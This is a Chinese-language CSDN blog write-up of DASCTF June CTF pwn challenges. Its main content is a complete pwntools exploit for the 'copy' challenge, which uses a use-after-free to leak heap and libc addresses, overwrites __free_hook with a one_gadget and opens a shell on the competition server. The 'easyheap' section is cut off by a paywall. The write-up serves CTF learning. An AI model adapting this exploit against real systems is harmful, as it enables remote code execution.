Dasctf 6月赛其余pwn WP

最新推荐文章于 2024-08-24 23:20:54 发布
最新推荐文章于 2024-08-24 23:20:54 发布
阅读量607 收藏
点赞数
分类专栏: pwn 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_31457355/article/details/106984989
版权
copy:

这题主要是堆风水的利用,通过运行我们可以发现,每次申请块之后都会free掉这个块,但是接下来执行删除操作的时候我们还可以利用这个指针因此存在uaf漏洞,剩下的就是堆风水的利用了,不再赘述
exp:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#from LibcSearcher import LibcSearcher
# context.log_level = 'debug'

binary = 'copy11'
elf = ELF('copy11')
libc = elf.libc
context.binary = binary

DEBUG = 0
if DEBUG:
  p = process(binary)
  # p=process(binary,env={"LD_PRELOAD":"./libc-2.27.so"})
else:
  host = "183.129.189.60"
  port =  10034
  p = remote(host,port)
o_g = [0x45216,0x4526a,0xf02a4,0xf1147]
magic = [0x3c4b10,0x3c67a8,0x846c0,0x45390]#malloc,free,realloc,system
l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)
se  = lambda payload: p.send(payload)
rl  = lambda      : p.recv()
sl  = lambda payload: p.sendline(payload)
ru  = lambda a     :p.recvuntil(str(a))
def cmd(idx):
	sla("choice:",str(idx))
def add(idx,size,payload):
	cmd(idx)
	if idx == 1:
		cmd(1)
		sla("input size:",str(size))
		sa("input data:",payload)
	else:
		cmd(1)
		sa("input data:",payload)
def free(idx,idx1):
	cmd(idx)
	cmd(2)
	sla("index?\n",str(idx1))
def show(idx,idx1):
	cmd(idx)
	cmd(3)
	sla("index?\n",str(idx1))

add(1,0x90,"a")
free(1,0)
add(1,0x90,"aaa")
show(1,0)
ru("data: ")
heap_addr = u64(p.recv(6).ljust(8,"\x00"))
lg("heap_addr",heap_addr)
add(1,0x90,p64(heap_addr-0x11f00-0xb0+0x10))
free(1,0)
free(1,1)
add(2,0x90,p64(heap_addr-0x11e00-0xb0+0x10))
payload = p64(0x101)+p64(0x0108)
payload += p64(0)*6
payload += p64(heap_addr-0x11e00-0xb0+0x10+0x60)
payload += p64(heap_addr+0xa0)
payload += p64(0)+p64(0x31)
payload += p64(0)*3+p64(0x21)
payload += p64(heap_addr+0xb0+0x10-0x20)
payload += p64(heap_addr-0x11e00-0xb0+0x10+0x50)
add(2,0x90,payload)
show(1,0)
libc_base = l64()-0x3ebca0
lg("libc_base",libc_base)
free_hook = libc_base+libc.sym["__free_hook"]
sys_addr = libc_base+libc.sym["system"]
payload = p64(0)*5+p64(0x31)+p64(0)*5
o_g = [0x4f2c5,0x4f322,0x10a38c]
one = o_g[1]+libc_base
free(2,1)
add(2,0x90,payload)
add(1,0x18,p64(free_hook)*3)
free(1,1)
add(1,0x60,p64(one))
# gdb.attach(p)
p.interactive()
easyheap:
溢出点:

libc2.27下的off by null可以参考cnitlrt,本题和我的简书上的第二个题的利用手法类似加了个沙盒:

最低0.47元/天 解锁文章
cnitlrt
关注
专栏目录
DASCTF2022 7月赋能赛 crypto wpDASCTF2022.07赋能赛Pwn easyheap)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
08-29 413
文章目录DASCTF2022 7月赋能赛 crypto wp sigin ezNTRU NTRURSA
DASCTF6月赛Pwn-azez_heap wp
qq_31457355的博客
10-07 1222
本次比赛是dasctf6月赛,学到了很多东西,感谢 1.首先着重记录一下azez_heap这个题目,剩下的题目放在另一篇博客 知识点: _IO_flush_all_lockp 触发条件 反向shell的利用 分析: checksec: 保护全开,毋庸置疑 通过ida分析可以确定程序的唯一漏洞点在edit里面,可以控制下一个堆块的fd和bk add里面size可以申请到0x2333已经很大了,根据以往的做题经验可以想到要打global_max_fast,而且堆块使用calloc分配,我们知道calloc
DASCTF六月团队赛(2020)-部分WP
~airrudder~
06-27 4294
本篇内容 MISC: Keyboard 透明度 Crypto: Gemini_Man Web: 简单的计算题1 简单的计算题2 phpuns Reverse: easy_maze 上一篇 | 目录 | 下一篇 刚打了DASCTF六月团队赛,情况虽不是很理想,但也记录一下团队解题情况。 Keyboard 尝试了很久发现没思路,搜索一下,发现是安恒DASCTF 四月战原题,甚至连flag都没变。 //查找含“keyboard”的文件 volatility -f Keyboard.raw .
DASCTF2024八月-pwn部分题解
最新发布
qq_41683953的博客
08-24 485
DASCTF2024八月开学季,PWN,clock,randArray
2020年DASCTF六月团队赛 REVERSE Magia
hhcjl的博客
06-30 743
2020年DASCTF六月团队赛 REVERSE Magia2020年DASCTF六月团队赛 REVERSE MagiaIDA静态分析字符串输入检测字符间逻辑检测继续IDA分析利用XDBG进行动态分析 2020年DASCTF六月团队赛 REVERSE Magia IDA静态分析 程序为32位Windows程序,拖入IDA3Pro分析 字符串输入检测 输入字符串后进入sub_403290()函数检测,满足以下条件: 1.字符串必须为32位。 2、第1、2、3、4、32位分别为‘N’、‘e’、‘p’、
安恒赛php_DASCTF6月赛
weixin_40007541的博客
12-21 308
因为和第五空间连着,然后昨天下午又去打了一场AWD,感觉身体掏空,就认真打了DASCTF(咕咕咕),剩下的题目等有机会再复现简单的计算器-1考点:python eval()代码注入,命令执行结果外带访问Source可以看到源码:#!/usr/bin/env python3# -*- coding: utf-8 -*-from flask import Flask, render_template,...
安恒六月赛DASCTF(web1,2)
weixin_43610673的博客
06-26 1737
简单的计算题-1 #!/usr/bin/env python3 # -*- coding: utf-8 -*- from flask import Flask, render_template, request,session from config import black_list,create import os app = Flask(__name__) app.config['SECRET_KEY'] = os.urandom(24) ## flag is in /flag try to ge
R()P DASCTF月赛pwn R()P题解
qq_43694952的博客
11-26 481
DASCTF月赛pwn R()P wp
DASCTF 6月部分pwn wp
starssgo的博客
06-27 1233
感觉质量挺高的,有点昏迷, 目录Memory-Monster-IVoooooordereasyheapspringboardsecret写在最后 Memory-Monster-IV 这个题我是真的服了,恶心了我一天时间,最后还是没出,知道是要改got表,而且每次只能改一个字节,第一次改后变成ret之类的无用函数,我是不想说啥,没复现出来,贴下作者的分析把: http://taqini.space/2020/06/26/DASCTF-June-Memory-Monster-IV-200pt/ 我感觉能学到的东
六月DASCTFre方面wp
weixin_43990313的博客
06-28 407
T0p Gear 题目是upx壳,先用upx脱壳后载入ida。 观察程序的逻辑。有三个关键check,分别进入观察逻辑。 check1(其中sub_401080是相等的比较函数)这段flag的结果就是字符串(注意字符串的顺序) 其实看汇编代码更直接一些。 check2,这是一个aes加密,对字符串进行加密然后和输入的数据进行比较。 可以直接在call这一位置下断,观察rax寄存器的情况。gdb调试下断即可。 查看rax寄存器的内容,得到字符串。 check3同理 拼接起来得到fag c92bb
DASCTF月赛部分赛题复现
weixin_44145820的博客
08-13 1330
目录PWNsecreteasyheap PWN secret 这题当时比赛的时候找到了先知上的一篇文章,研究了它的代码想在本题复现,但是总是不成功 看了大佬们的博客,发现这题居然这么简单Orz 简单说一下这题的原理: 本题先close了stdout,然后给写两字节和0x18字节的机会,之后close stderr和stdin 那么我们先分析一下fclose的源码,其核心函数是位于/libio/iofclose.c的_IO_new_fclose函数,其大致流程是:首先检查文件结构体指针,之后使用_IO_
DASCTF6pwn (oooorder secret Memory_Monster_IV springboard easyheap)
carol2358的博客
07-08 981
oooorder malloc可以从bin里取回可以保留内容, realloc size为0时会free这个chunk, 本题就有UAF漏洞了 先free然后再取回, 相同的两次操作拿到heap_base, libc_base, 然后uaf把free_hook覆盖为setcontext+53 后半部分是setcontext+orw(请自备flag文件),用在沙盒堆里, setcontext可以看这里, 计算距离rdi的偏移就行, 控制好0xa(rsp)和0xa8(rip) http://bl...
pwn】oooorder
Nothing
06-29 593
端午节看了dasctf的一个pwn题,学了一个新的姿势。 例行检查 分析程序 这是个堆的菜单题,并且用了seccomp进行保护,禁用了execve。这时候一般想法是orw直接将flag写出来。但是堆的题禁用了这个还是比较麻烦的,因为堆的题无法对栈进行控制就不能进行rop,这个先放一放,先进行堆利用。 漏洞是在edit中,其中使用的了realloc,当size为0的时候,realloc会free掉这个块,执行两次可以造成tcache dup,这里可以泄露堆地址,第一次任意地址分配可以分配到一个unsortb
DASCTF&NepCTF 部分writeup
weixin_44145820的博客
06-26 4389
目录PWNoooorderspringboardeasyheap(本地成功)RET0p GearpyCharm521MagiaMISC透明度 PWN oooorder 一道不太复杂的题目,利用点都是之前遇到的,运气好拿到了一血 edit中进行了realloc,如果size为0就会执行free,利用这个进行double free,由于禁用了execve,需要用setcontext执行mprotect并执行orw的shellcode 关于orw部分,具体请见这篇博客:BUUCTF-PWN rctf_2019_
DASCTF 7月部分pwn
starssgo的博客
07-25 1540
做了pwn1跟pwn3,pwn2没做出来(俺是废物)… pwn1 签到题,但是我们要记住 .text:080485F8 mov eax, 0 .text:080485FD mov ecx, [ebp+var_4] .text:08048600 leave .text:08048601 lea esp, [ecx-4] .text:08048604
DASCTF安恒四月月赛web复现wp
xlcvv的博客
05-02 1179
趁着平台还开放,赶紧复现一下: Ezunserialize babytricks 一、Ezunserialize 题目给了源码: <?php show_source("index.php"); function write($data) { return str_replace(chr(0) . '*' . chr(0), '\0\0\0', $data); } functio...
2021年“极客谷杯”数据安全劳动和技能竞赛部分WP
七堇年的博客
12-24 1601
2021年“极客谷杯”数据安全劳动和技能竞赛WP
安恒月赛2020年DASCTF——四月春季赛---Web-Writeup
SopRomeo的博客
04-29 3730
比赛的时候去玩了,刚好兄弟们发了第一个web的源码,于是我自己复现了一下 <?php show_source("index.php"); error_reporting(0); function write($data){ return str_replace(chr(0) . '*' . chr(0), '\0\0\0', $data); } function read($data){...
Linux pwn零基础入门教程:环境配置到实战攻击
"i春秋月刊第六期的主题深入探讨了Linux pwn(Privilege Escalation,权限提升)的零基础入门教程。该系列由Tangerine@SAINTSEC作者撰写,历时三个月精心编撰,旨在解决新手在Linux环境下攻破安全挑战时遇到的难题,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值